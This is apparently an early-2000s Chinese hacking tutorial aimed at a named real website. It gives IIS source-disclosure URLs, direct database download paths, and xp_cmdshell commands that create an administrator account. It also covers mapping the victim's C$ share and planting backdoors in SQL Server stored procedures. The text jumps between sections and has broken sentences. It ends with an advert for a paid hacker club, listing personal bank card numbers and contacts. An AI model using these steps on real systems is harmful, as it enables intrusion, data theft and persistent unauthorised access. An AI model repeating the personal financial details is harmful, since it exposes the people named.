一般的web server都要使用数据库来存储信息,几乎所有的网站都要用数据库。这样就存在着两种可能,一种是使用小型数据库,如aceess,一般就储存在本地。另一种是使用大型数据库,如SQL server,Oracle这时候一般就放在另一台机器上,然后通过ODBC来访问它。
由于页面经常需要查询各种信息,修改用户信息等操作,实质上就是和数据库打交道了。这样就给非法用户留下利用的机会了。
1.对本地数据库的攻击。
对本地数据库的攻击一种方法就是下载数据库,然后呢,你就可以打开这个数据库得到内部的用户和帐号了,以及其它有用的信息。
下面以“水莲会”为例:
经过扫描,www.suilian.net使用的是虚拟主机,使用的是WIndows NT+IIS4.0.扫描器你可以使用twwwscan或者其它,其实功能都大同小异。
在对IIS攻击时如果能够看到ASP源代码,那么成功的可能性就很大了。
经过测试,发现此站点存在源代码暴露漏洞。。。
大家可以试试:
http://www.suilian.net/null.htw?CiWebhitsfile=/maillist.asp%20&CiRestriction=
none&CiHiliteType=full
http://www.suilian.net/null.htw?CiWebhitsfile=/index.asp%20&CiRestriction=
none&CiHiliteType=full
http://www.suilian.net/null.htw?CiWebhitsfile=/chat/DetNew.asp%20&CiRestriction=
none&CiHiliteType=full
http://www.suilian.net/null.htw?CiWebhitsfile=/chat/detail.asp%20&CiRestriction=
none&CiHiliteType=full
http://www.suilian.net/null.htw?CiWebhitsfile=/chat/topic4.asp%20&CiRestriction=
none&CiHiliteType=full
http://www.suilian.net/null.htw?CiWebhitsfile=/chat/titlefrm.asp%20&CiRestriction=
none&CiHiliteType=full
http://www.suilian.net/null.htw?CiWebhitsfile=/chat/titlenew.asp%20&CiRestriction=
none&CiHiliteType=full
看见了什么?
当然源代码泄露的漏洞有很多种,这里就不一一列举,你可以去查漏洞手册。
现在你就可以去查看ASP源代码了。
如果你对ASP不熟悉,我简单介绍一下。
ASP是嵌在<%和%>之间。一般使用VBscript或者java script书写代码。
看这个例子使用VBscript书写的:
<%
...
set cn1=server.createobject("ADODB.connection")
dbpath=server.mappath("user.mdb")
cn1.open "driver={microsoft access driver (*.mdb)};dbq="&dbpath
set rs=server.createobject("ADODB.recordset")
rs.open "select * from yhb",cn1,adopenkeyset
...
%>
这是一个典型的与数据库连接的代码。
依次的步骤为:
建立连接对象,
设置数据库路径,
打开数据库,
设置记录对象,
取记录。
这里我们就可以知道数据库的类型,名称和路径,这里是在当前目录下。
还可以知道数据库的表名和字段名称。
有经验的程序员一般不会把数据库名直接放在代码里,而是在ODBC里设置数据源,以增加安全性。
然后就发现存在
d:\S\suilian\chat\news.mdb
d:\S\suilian\topic22.mdb等数据库
你只要使用
http://www.suilian.net/chat/news.mdb
http://www.suilian.net/topic22.mdb
就可以把它下载下来...
1。突破script的限制。
例如,某网页上有一文本框,允许你输入用户名称,但是它限制你只能输入4个字符。许多程序都是在客户端限制,然后用msgbox弹出错误提示。如果你攻击时需要突破此限制,只需要在本地做一个一样的主页,只是取消了限制,通常是去掉VBscript或Iavascript的限制程序,就可以成功突破。
如果是java script做的,干脆临时把浏览器的脚本支持关掉。如果是,所以可以用java script把它转到其他站点上或做些什么。
如果只是改了端口号就要看程序里数据库用户的权限了,如果是管理用户,可以用 exec master.dbo.xp_cmshell net user /add aaa bbb来创建一个操作系统用户,然后再用 exec master.dbo.xp_cmdshell net localgroup /add administrators aaa来把它升级为超级用户。
如果这台服务器的NetBIOS绑定了TCP/IP,而且C$、D$等管理共享存在,呵呵,恭喜了,你在DOS命令下用net use Z: \ip address$ "bbb" /user:"aaa"就可以把对方的整个C盘映射为你本地的一个网络驱对器Z:了。
6。数据库里如何留后门。
创建用户的sp_addlogin、权限分配的sp_addsrvrolemember是用一条语句来判断用户是否有权限执行,也就是说用户都可以执行它,它再来判断用户是否有权执行。
当你攻入一个数据库时可以用它的Enterprise Manager来连上去修改这些存储过程,因为这些存储过程都没有加密。
可以在判断的地方加个条件,当这个条件满足时就不直接执行下去而不管是什么权限的用户调用它。
不过改完要注意,这时它的Type成了User,要想改回可以到sysobjects表中把name为sp_addlogin的一条删除,然后再把没有改过的相同版本的MS SQL Server的同一条记录拷贝进去就可以了。
当然不要忘了这些默认是不能手工修改的,要修改得先把掉SQL Server的参数,改完不要忘了再改回来啊:) 这时只要网站的程序有问题,不管程序中的用户权限如何,你都可以随时创建SQL Server的管理用户。
7。数据库扫描工具。
ISS DATABASE Scanner
本站开辟VIP会员专区
1。多家黑客站点站长聊天室教授扫描技术,穷举,DDOS,IPC,IIS,SQL,溢出,木马
技术,网页技术,http隧道,QQ攻防技术,代码分析……教会为止。
2。送经典书籍两本,送黑客工具光盘一个,光盘附送技术文章,每周两小时课程,每月
一次电话支持。
3。E-mail技术支持,送20M会员专用邮箱。
4。一个月会有一个模拟服务器给会员练习攻防技术。
5。一年结束时举行竞赛(攻防比赛,抢夺肉鸡比赛等等),优胜者可以获得奖金。奖金
预定为500元。
6入侵美国五角大楼的国内知名黑客不长叶子的树,暗域网络冰血封情,水晶黑客联盟站长mood,五月安全网站长design,龙行天下网络站长傲气雄鹰,安全天使站长Angel,黑色海岸线站长blackleaf,黑色海岸线第一任技术部长blackghost,第二任技术部长bigblock,为大家讲课~也将邀请其他国内知名站点站长,技术部长为大家讲课,并为大家提供软件下载,包括俄罗斯Shadow系列SSS安全扫描工具 Shadow Security Scanner,美国黑客工具Boondocks 下载并教授 !其中Shadow Security Scanner是黑客软件中最牛的一种
开始授课日期:2003年12月27号
会员资费:100元/人/年(限报名人数200人)
交费方式:邮局汇款:西安电子科技大学112号信箱010213班 刘善伦 710071(请注明黑海
会员报名,同时附上黑海的用户名)
交通银行: 卡号:40551260814549001 姓名:刘善伦(确认汇款后请用邮件发送你
的帐号跟黑海用户名给我)
招商银行一卡通 卡号:9555505311296535
开户地:济南
户名:陆威 QQ:58263087 E-mail:feicw@sina.com
帐号:中国工商银行牡丹灵通卡 城市:浙江杭州
9558 8012 0210 4123675 开户人:吴滨虹
中国建设银行龙卡
4367 4215 4100 0529 126 城市:浙江杭州
开户人:吴滨虹 QQ:38980512
报名方法:邮箱:bigblock@hackersky.net (本人会有确认信件回复)
注:具体事宜待通知。 |